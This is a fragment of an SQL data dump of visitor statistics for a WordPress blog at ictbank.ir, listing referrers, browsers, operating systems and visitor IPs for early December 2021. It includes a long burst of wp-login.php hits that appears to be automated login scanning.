(16559,'2021-12-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.69.44.26','000',0,1,0),
(16560,'2021-12-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.175.110.97','000',0,2,0),
(16561,'2021-12-01','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(16562,'2021-12-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.13.75.122','000',0,2,0),
(16563,'2021-12-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,2,0),
(16564,'2021-12-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(16565,'2021-12-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(16566,'2021-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.191','000',0,4,0),
(16567,'2021-12-01','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.71','000',0,3,0),
(16568,'2021-12-01','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.249','000',0,1,0),
(16569,'2021-12-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','202.3.247.118','000',0,1,0),
(16570,'2021-12-02','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','75.101.220.240','000',0,1,0),
(16571,'2021-12-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,4,0),
(16572,'2021-12-02','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.64','000',0,8,0),
(16573,'2021-12-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(16574,'2021-12-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','14.213.126.32','000',0,1,0),
(16575,'2021-12-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.197','000',0,7,0),
(16576,'2021-12-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.184.150','000',0,2,0),
(16577,'2021-12-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(16578,'2021-12-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.196.48','000',0,1,0),
(16579,'2021-12-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.122','000',0,2,0),
(16580,'2021-12-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.146.4.189','000',0,1,0),
(16581,'2021-12-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,5,0),
(16582,'2021-12-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.14','000',0,2,0),
(16583,'2021-12-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.97.67.50','000',0,1,0),
(16584,'2021-12-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','37.98.68.141','000',0,6,0),
(16585,'2021-12-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.82.217','000',0,1,0),
(16586,'2021-12-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.219.161','000',0,1,0),
(16587,'2021-12-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(16588,'2021-12-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(16589,'2021-12-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(16590,'2021-12-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(16591,'2021-12-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.13.75.122','000',0,2,0),
(16592,'2021-12-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.175','000',0,1,0),
(16593,'2021-12-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.254','000',0,7,0),
(16594,'2021-12-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.16.211','000',0,2,0),
(16595,'2021-12-03','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,24,0),
(16596,'2021-12-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','71.193.66.245','000',0,1,0),
(16597,'2021-12-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(16598,'2021-12-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.111.10','000',0,2,0),
(16599,'2021-12-03','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','91.208.197.96','000',0,1,0),
(16600,'2021-12-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(16601,'2021-12-03','http://www.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,1,0),
(16602,'2021-12-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.37.165.128','000',0,18,0),
(16603,'2021-12-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,3,0),
(16604,'2021-12-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.152.27','000',0,3,0),
(16605,'2021-12-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.43.110','000',0,2,0),
(16606,'2021-12-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.185.158.39','000',0,1,0),
(16607,'2021-12-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.10','000',0,2,0),
(16608,'2021-12-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.118','000',0,3,0),
(16609,'2021-12-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(16610,'2021-12-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','68.183.12.129','000',0,1,0),
(16611,'2021-12-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(16612,'2021-12-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(16613,'2021-12-03','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.84','000',0,1,0),
(16614,'2021-12-03','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.4','000',0,1,0),
(16615,'2021-12-03','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.68','000',0,1,0),
(16616,'2021-12-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.116','000',0,1,0),
(16617,'2021-12-03','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,1,0),
(16618,'2021-12-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','46.199.48.32','000',0,2,0),
(16619,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.151.207','000',0,1,0),
(16620,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.123.182','000',0,1,0),
(16621,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.35.163','000',0,1,0),
(16622,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.218.67','000',0,1,0),
(16623,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.208.216','000',0,1,0),
(16624,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.5.103','000',0,1,0),
(16625,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.124.110','000',0,1,0),
(16626,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.233.165','000',0,1,0),
(16627,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.98.199','000',0,1,0),
(16628,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.11.212.130','000',0,1,0),
(16629,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.156.13','000',0,1,0),
(16630,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.232.223','000',0,1,0),
(16631,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.213.134','000',0,1,0),
(16632,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.112.136','000',0,1,0),
(16633,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.161.19','000',0,1,0),
(16634,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.93.100','000',0,1,0),
(16635,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.214.28','000',0,1,0),
(16636,'2021-12-04','https://www.bing.com','Chrome','Windows','6.4',NULL,NULL,'','82.98.137.28','000',0,1,0),
(16637,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.97.224','000',0,1,0),
(16638,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.164.244','000',0,1,0),
(16639,'2021-12-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(16640,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.123.103','000',0,1,0),
(16641,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.91.162.52','000',0,1,0),
(16642,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.111.130','000',0,1,0),
(16643,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.152.221','000',0,1,0),
(16644,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.105.217','000',0,1,0),
(16645,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.83.163.13','000',0,1,0),
(16646,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.181.192','000',0,2,0),
(16647,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','35.164.147.95','000',0,1,0),
(16648,'2021-12-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(16649,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.152.22','000',0,1,0),
(16650,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.34.43','000',0,1,0),
(16651,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.99.131','000',0,1,0),
(16652,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.144.102','000',0,1,0),
(16653,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.105.240','000',0,1,0),
(16654,'2021-12-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(16655,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.94.46','000',0,1,0),
(16656,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.64.69','000',0,1,0),
(16657,'2021-12-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.63.31','000',0,1,0),
(16658,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.160.236','000',0,1,0),
(16659,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.108.175','000',0,1,0),
(16660,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.200.23','000',0,1,0),
(16661,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.170.139','000',0,1,0),
(16662,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.227.16.97','000',0,2,0),
(16663,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.83.96','000',0,1,0),
(16664,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.121.139','000',0,1,0),
(16665,'2021-12-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.170','000',0,3,0),
(16666,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.182.140','000',0,1,0),
(16667,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.37.253','000',0,1,0),
(16668,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.7.158','000',0,1,0),
(16669,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.144.194','000',0,1,0),
(16670,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.233.201','000',0,1,0),
(16671,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.105.244','000',0,1,0),
(16672,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.242.62','000',0,1,0),
(16673,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.82.243.91','000',0,1,0),
(16674,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.110.60','000',0,1,0),
(16675,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.124.187','000',0,1,0),
(16676,'2021-12-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.197.5','000',0,2,0),
(16677,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.72.173','000',0,1,0),
(16678,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.210.9','000',0,1,0),
(16679,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.83.51','000',0,1,0),
(16680,'2021-12-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.116','000',0,1,0),
(16681,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.205.224','000',0,1,0),
(16682,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.225.3','000',0,1,0),
(16683,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.138.190','000',0,1,0),
(16684,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.136.118','000',0,1,0),
(16685,'2021-12-04','http://m.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.136','000',0,6,0),
(16686,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.159.89','000',0,1,0),
(16687,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.20.166','000',0,2,0),
(16688,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.101.141','000',0,1,0),
(16689,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.162.151','000',0,1,0),
(16690,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.91.184.38','000',0,1,0),
(16691,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.225.212','000',0,1,0),
(16692,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.45.160','000',0,1,0),
(16693,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.242.129','000',0,1,0),
(16694,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.190.160.56','000',0,1,0),
(16695,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.112.15','000',0,1,0),
(16696,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.226.155','000',0,1,0),
(16697,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.211.166','000',0,1,0),
(16698,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.159.134.57','000',0,1,0),
(16699,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.84.31.239','000',0,1,0),
(16700,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.199.197','000',0,1,0),
(16701,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.117.33','000',0,1,0),
(16702,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.124.59','000',0,1,0),
(16703,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.123.61','000',0,1,0),
(16704,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.249.85','000',0,1,0),
(16705,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.91.152.146','000',0,1,0),
(16706,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.219.21','000',0,1,0),
(16707,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.232.134','000',0,1,0),
(16708,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.185.177','000',0,1,0),
(16709,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.67.138','000',0,1,0),
(16710,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.100.68','000',0,1,0),
(16711,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.76.159','000',0,1,0),
(16712,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.226.50.103','000',0,1,0),
(16713,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.173.89.146','000',0,1,0),
(16714,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.12.100','000',0,1,0),
(16715,'2021-12-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.51.228','000',0,1,0),
(16716,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.236.190','000',0,1,0),
(16717,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.6.108.79','000',0,1,0),
(16718,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.197.48','000',0,1,0),
(16719,'2021-12-04','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.185.132.51','000',0,5,0),
(16720,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.152.162','000',0,1,0),
(16721,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.210.81.171','000',0,1,0),
(16722,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.15.239','000',0,1,0),
(16723,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.184.91','000',0,1,0),
(16724,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.149.52','000',0,1,0),
(16725,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.229.240','000',0,1,0),
(16726,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.26.205','000',0,1,0),
(16727,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.27.232','000',0,1,0),
(16728,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.163.10.215','000',0,1,0),
(16729,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.224.226','000',0,1,0),
(16730,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.195.169','000',0,1,0),
(16731,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.141.47','000',0,1,0),
(16732,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.202.230.85','000',0,1,0),
(16733,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.109.65','000',0,1,0),
(16734,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.84.15.16','000',0,1,0),
(16735,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.86.197.51','000',0,1,0),
(16736,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.84.199.159','000',0,1,0),
(16737,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.205.227.73','000',0,1,0),
(16738,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.181.87','000',0,1,0),
(16739,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.157.209','000',0,1,0),
(16740,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.95.225','000',0,1,0),
(16741,'2021-12-04','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','158.46.54.189','000',0,2,0),
(16742,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.205.154.182','000',0,1,0),
(16743,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.69.30','000',0,1,0),
(16744,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.231.13','000',0,1,0),
(16745,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.90.189.64','000',0,1,0),
(16746,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.242.22','000',0,1,0),
(16747,'2021-12-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(16748,'2021-12-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(16749,'2021-12-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(16750,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.204.218.224','000',0,1,0),
(16751,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.147.57','000',0,1,0),
(16752,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.162.121.102','000',0,1,0),
(16753,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.65.27','000',0,1,0),
(16754,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.83.156','000',0,1,0),
(16755,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.147.141','000',0,1,0),
(16756,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.79.84','000',0,1,0),
(16757,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.89.20.170','000',0,1,0),
(16758,'2021-12-04','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.67.244','000',0,1,0),
(16759,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.156.120.196','000',0,1,0),
(16760,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.205.237','000',0,1,0),
(16761,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.109.172','000',0,1,0),
(16762,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.241.211','000',0,1,0),
(16763,'2021-12-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(16764,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.83.131','000',0,1,0),
(16765,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.93.4.196','000',0,1,0),
(16766,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.161.190.139','000',0,1,0),
(16767,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.230.133','000',0,1,0),
(16768,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.34.156','000',0,1,0),
(16769,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.210.88','000',0,1,0),
(16770,'2021-12-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
(16771,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.87.164.98','000',0,1,0),
(16772,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.242.194','000',0,1,0),
